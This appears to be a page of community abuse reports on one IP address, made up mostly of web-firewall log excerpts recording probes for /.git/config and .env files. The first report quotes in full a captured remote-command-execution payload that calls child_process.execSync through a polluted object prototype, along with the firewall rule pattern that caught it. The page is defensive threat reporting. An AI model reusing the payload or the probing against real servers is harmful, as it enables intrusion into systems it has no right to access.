π¨π
4server
2026-09-02 18:04:55
(13 minutes ago)
[WedSep0220:04:50.8936522026][security2:error][pid642106:tid642872][client35.244.85.40:0]ModSecurity ...
show more
[WedSep0220:04:50.8936522026][security2:error][pid642106:tid642872][client35.244.85.40:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Patternmatch\"\(\?:\\\\\\\\\$\(\?:\\\\\\\\\(\(\?:\\\\\\\\\(.\*\\\\\\\\\)\|.\*\)\\\\\\\\\)\|\\\\\\\\{.\*\\\\\\\\}\)\|[\<\>]\\\\\\\\\(.\*\\\\\\\\\)\)\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"396\"][id\"393655\"][rev\"17\"][msg\"Atomicorp.comWAFRules:PossibleRemoteCommandExecution:UnixShellExpressionFound\"][data\"MatchedData:\$\(\(41\*271\)\)foundwithinARGS:0:{then:\$1:__proto__:thenstatus:resolved_modelreason:-1value:{then:\$b1337}_response:{_prefix:varres=process.mainmodule.require\(child_process\).execsync\(echo\$\(\(41\*271\)\)\|base64-w0\).tostring\(\).trim\(\)throwobject.assign\(newerror\(next_redirect\){digest:\`next_redirectpush/login\?a=\${res}307\`}\)_chunks:\$q2_formdata:{get:\$1:constructor:constructor}}}\"][tag\"attack-rce\"][hostname\"www.staging.swiss-sailing-system.ch\"][uri\"/\"][unique_id\"aphlQt3qi2tjbtp6jpJBWAAAAUk\"]
show less
Hacking
Web App Attack
πΊπΈ
TPI-Abuse
2026-09-02 15:47:17
(2 hours ago)
(mod_security) mod_security (id:210492) triggered by 35.244.85.40 (40.85.244.35.bc.googleusercontent ...
show more
(mod_security) mod_security (id:210492) triggered by 35.244.85.40 (40.85.244.35.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Sep 02 11:47:13.546114 2026] [security2:error] [pid 32302:tid 32329] [client 35.244.85.40:52072] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.staging.paulvester.com"] [uri "/.git/config"] [unique_id "aphFAWmqaDjdWeyvx7Zu3AAAAVc"]
show less
Brute-Force
Bad Web Bot
Web App Attack
πΊπΈ
TPI-Abuse
2026-09-02 13:23:08
(4 hours ago)
(mod_security) mod_security (id:210492) triggered by 35.244.85.40 (40.85.244.35.bc.googleusercontent ...
show more
(mod_security) mod_security (id:210492) triggered by 35.244.85.40 (40.85.244.35.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Sep 02 09:23:04.857385 2026] [security2:error] [pid 100865:tid 100988] [client 35.244.85.40:56962] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.staging.kettlehill.com"] [uri "/.git/config"] [unique_id "apgjOP6L_5tBoWEgBEEMwwAAAJE"]
show less
Brute-Force
Bad Web Bot
Web App Attack
πΊπΈ
TPI-Abuse
2026-09-02 12:00:52
(6 hours ago)
(mod_security) mod_security (id:210492) triggered by 35.244.85.40 (40.85.244.35.bc.googleusercontent ...
show more
(mod_security) mod_security (id:210492) triggered by 35.244.85.40 (40.85.244.35.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Sep 02 08:00:44.664550 2026] [security2:error] [pid 8565:tid 8565] [client 35.244.85.40:45142] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.staging.gmp-ts.com"] [uri "/.git/config"] [unique_id "apgP7HaiXOr60A8lH--J-AAAAA4"]
show less
Brute-Force
Bad Web Bot
Web App Attack
πΊπΈ
TPI-Abuse
2026-09-02 11:11:30
(7 hours ago)
(mod_security) mod_security (id:210492) triggered by 35.244.85.40 (40.85.244.35.bc.googleusercontent ...
show more
(mod_security) mod_security (id:210492) triggered by 35.244.85.40 (40.85.244.35.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Sep 02 07:11:26.488971 2026] [security2:error] [pid 30629:tid 30629] [client 35.244.85.40:46916] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.staging.eta-mct.com"] [uri "/.git/config"] [unique_id "apgEXswIG2TljpmEoCc2fwAAAC4"]
show less
Brute-Force
Bad Web Bot
Web App Attack
π΅π±
miriks
2026-09-02 08:46:52
(9 hours ago)
Automated scan detected: GET /.git/config β UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi ...
show more
Automated scan detected: GET /.git/config β UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
show less
Port Scan
Web App Attack
π²πΎ
Rizzy
2026-09-02 06:01:49
(12 hours ago)
Multiple WAF Violations
Brute-Force
Web App Attack
Anonymous
2026-09-02 03:54:30
(14 hours ago)
[ns67.kdns.gr] httpd-config-scan: sites=stagestories.gr; logs=/var/www/vhosts/stagestories.gr/logs/a ...
show more
[ns67.kdns.gr] httpd-config-scan: sites=stagestories.gr; logs=/var/www/vhosts/stagestories.gr/logs/access_ssl_log,/var/www/vhosts/system/stagestories.gr/logs/access_ssl_log; samples=/.git/config | /.env | /.env.local
show less
Hacking
Web App Attack
π«π·
Octopuce
2026-09-02 02:37:32
(15 hours ago)
Aggressive web search of vulnerable pages: / /.env /.env.local /app/.env /apps/.env ...
Web App Attack
πΊπΈ
TPI-Abuse
2026-09-02 01:33:07
(16 hours ago)
(mod_security) mod_security (id:210492) triggered by 35.244.85.40 (40.85.244.35.bc.googleusercontent ...
show more
(mod_security) mod_security (id:210492) triggered by 35.244.85.40 (40.85.244.35.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 01 21:33:02.840808 2026] [security2:error] [pid 22330:tid 22330] [client 35.244.85.40:54754] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.stage.cyberclay.net"] [uri "/.git/config"] [unique_id "apd8zupd2_FdDfJ5Y4oJWQAAAA0"]
show less
Brute-Force
Bad Web Bot
Web App Attack
π©πͺ
EGP Abuse Dept
2026-09-02 01:09:33
(17 hours ago)
Scanning for web/db/file exploits on www.stage-match.nl
SQL Injection
Bad Web Bot
Web App Attack
π¨π
backslash
2026-09-02 00:06:17
(18 hours ago)
block ruleset WAF detection and high score on abuseIPDB 149EB1B42C242111FADBBC2EF8F90219570691E1
Bad Web Bot
πΈπͺ
vaia.cloud
2026-09-01 23:45:02
(18 hours ago)
crowdsecurity/http-admin-interface-probing
Brute-Force
Web App Attack
π³π±
Site.eu
2026-09-01 22:37:12
(19 hours ago)
Excessive multi-domain requests
Brute-Force
π³π±
homeshowdomain.nl
2026-09-01 21:59:26
(20 hours ago)
Auto-ban: >3000 req/min op 2026-09-01
Web App Attack
SSH
Hacking